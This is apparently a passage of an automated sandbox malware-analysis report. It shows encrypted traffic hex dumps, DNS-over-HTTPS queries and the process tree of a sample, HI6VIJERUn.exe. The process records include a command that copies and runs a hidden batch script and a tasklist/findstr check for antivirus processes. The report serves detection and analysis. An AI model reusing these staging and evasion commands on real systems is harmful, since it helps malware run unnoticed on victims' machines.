                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 bb
                                                                                                                                                                                                                                                                                                        Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 bd
                                                                                                                                                                                                                                                                                                        Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb 4c
                                                                                                                                                                                                                                                                                                        Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGWL
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd bf
                                                                                                                                                                                                                                                                                                        Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 30
                                                                                                                                                                                                                                                                                                        Data Ascii: =+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v0
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 fa
                                                                                                                                                                                                                                                                                                        Data Ascii: K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 0f
                                                                                                                                                                                                                                                                                                        Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 8f
                                                                                                                                                                                                                                                                                                        Data Ascii: aW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC1390INData Raw: 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 20
                                                                                                                                                                                                                                                                                                        Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        1192.168.2.1149741162.159.61.34437804C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 13:55:41 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f3fa6eab96743c4-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa 48 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomHc)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        2192.168.2.1149742162.159.61.34437804C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:41 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                                        Date: Wed, 18 Dec 2024 13:55:41 GMT
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                        Content-Length: 468
                                                                                                                                                                                                                                                                                                        CF-RAY: 8f3fa6eab8d215c7-EWR
                                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 12 00 04 8e fa 41 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcomA)


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        3192.168.2.1149743162.159.61.34437804C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                        4192.168.2.1149744162.159.61.34437804C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                        Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                        Content-Length: 128
                                                                                                                                                                                                                                                                                                        Accept: application/dns-message
                                                                                                                                                                                                                                                                                                        Accept-Language: *
                                                                                                                                                                                                                                                                                                        User-Agent: Chrome
                                                                                                                                                                                                                                                                                                        Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                        Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                        2024-12-18 13:55:42 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                        Data Ascii: wwwgstaticcom)TP


                                                                                                                                                                                                                                                                                                        Statistics

                                                                                                                                                                                                                                                                                                        CPU Usage

                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                        Memory Usage

                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                        High Level Behavior Distribution

                                                                                                                                                                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                                                                                                                                                                        Behavior

                                                                                                                                                                                                                                                                                                        Click to jump to process

                                                                                                                                                                                                                                                                                                        System Behavior

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:0
                                                                                                                                                                                                                                                                                                        Start time:08:54:43
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Users\user\Desktop\HI6VIJERUn.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Users\user\Desktop\HI6VIJERUn.exe"
                                                                                                                                                                                                                                                                                                        Imagebase:0x400000
                                                                                                                                                                                                                                                                                                        File size:1'374'325 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:3DA674C87AA02F410B79109A2E5B1448
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:2
                                                                                                                                                                                                                                                                                                        Start time:08:54:44
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:"C:\Windows\System32\cmd.exe" /c copy Ampland Ampland.cmd & Ampland.cmd
                                                                                                                                                                                                                                                                                                        Imagebase:0xc30000
                                                                                                                                                                                                                                                                                                        File size:236'544 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:3
                                                                                                                                                                                                                                                                                                        Start time:08:54:44
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                        Imagebase:0x7ff68cce0000
                                                                                                                                                                                                                                                                                                        File size:862'208 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:4
                                                                                                                                                                                                                                                                                                        Start time:08:54:46
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:tasklist
                                                                                                                                                                                                                                                                                                        Imagebase:0x930000
                                                                                                                                                                                                                                                                                                        File size:79'360 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:5
                                                                                                                                                                                                                                                                                                        Start time:08:54:46
                                                                                                                                                                                                                                                                                                        Start date:18/12/2024
                                                                                                                                                                                                                                                                                                        Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                                                                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                                        Commandline:findstr /I "wrsa opssvc"
                                                                                                                                                                                                                                                                                                        Imagebase:0x250000
                                                                                                                                                                                                                                                                                                        File size:29'696 bytes
                                                                                                                                                                                                                                                                                                        MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                                                                                                                                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                                        Reputation:high
                                                                                                                                                                                                                                                                                                        Has exited:true

                                                                                                                                                                                                                                                                                                        General

                                                                                                                                                                                                                                                                                                        Target ID:6
                                                                                                                                                                                                                                                                                                        Start time:08:54:47
